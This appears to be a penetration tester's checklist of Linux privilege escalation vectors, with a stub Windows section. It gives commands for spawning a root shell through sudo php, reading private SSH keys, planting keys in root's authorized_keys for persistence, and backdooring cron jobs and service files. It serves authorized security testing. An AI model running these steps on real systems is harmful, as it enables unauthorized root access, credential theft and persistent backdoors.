Possible privilege escalation vectors - Manual checklist

Check list for common vectors to escalate on Linux & Windows. Use index ->

Linux check list

Check for sudo current user privileges

sudo -l                 #Shows what sudo privileges the user has
sudo su -               #If (ALL:ALL) ALL or privileges on "su", switchs to root user

#user ALL=(ALL) NOPASSWD: /usr/bin/php
sudo php -r “system(‘/bin/sh’);”        #/bin/sh to return root shell but you can execute whatever  ?"-r" runs php code directly from the CLI, "system" is a function used to execute external commands

Check if sudo version is outdated and vulnerable

sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
searchsploit sudo

OS & Kernel outdated

Keep in mind kernel exploits can cause system instability, if this is a production system coordinate with the client first.

cat /etc/os-release 
uname -a

searchsploit versionFound

PATH

If you can write on $PATH directories you may be able to exploit some binaries or libraries.

#Oneliner to check if directories in $PATH are writtable 
for dir in $(echo $PATH | tr ':' ' '); do [ -w "$dir" ] && echo ";) Can write on $dir" || echo "Can't write on $dir"; done

Vulnerable software installed

dpkg -l         #List software on Debian
rpm -qa         #List software on CentOS

Over-privileged processes 

ps -aux    
ps -ef
top            #Dynamic real time
top -n 1       #One snapshot

Writable .service files

If you find any writable .service files, you could modify them so they execute your scripts with higher privileges, also you could place a shell to establish a backdoor and maintain persistence.

#Example on a service config file
ExecStart=/tmp/your_script.sh  #Executes the script on service start

Cron jobs

If you have write permissions to cron jobs you could place a script with a reverse shell which would activate once the timer is up granting us access

#Some places to check
/etc/crontab
/etc/cron.d/
/var/spool/cron/crontabs/root

Exposed credentials

Some files can contain plain text credentials, its common in config files, logs and user history files (bash_history or PSReadLine in Windows). We could also check for password reuse as passwords used for non-critical software could also be used for root for example.

SSH Keys

If we have access to the .ssh directory we may find there their private ssh keys and use them to log as the user without credentials with the -i flag

#Common places
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa

#How to use it in our machine
nano id_rsa
chmod 600 id_rsa   #We change privileges so the ssh server doesn't set off the alarms and prevents it from working
ssh user@ip -i id_rsa

If we can access to a users .ssh directory we could place our public key at /home/user/.ssh/authorized_keys this way we could have a more stable access as we can ssh into the system, of course after we first exploited and gained a shell. 

#First we generate the key pair in our machine with
ssh-keygen -f key

#This will give us 2 files:
#Private "key" wich we will use with ssh -i
#Public key "key.pub" that we will copy into the victim's directory or root
echo "key.pub contents" >> /root/.ssh/authorized_keys
echo "key.pub contents" >> /home/user/.ssh/authorized_keys

ssh root@ip -i key
ssh user@ip -i key

Windows

Check for vulnerable software installed

dir C:\Program Files

Last updated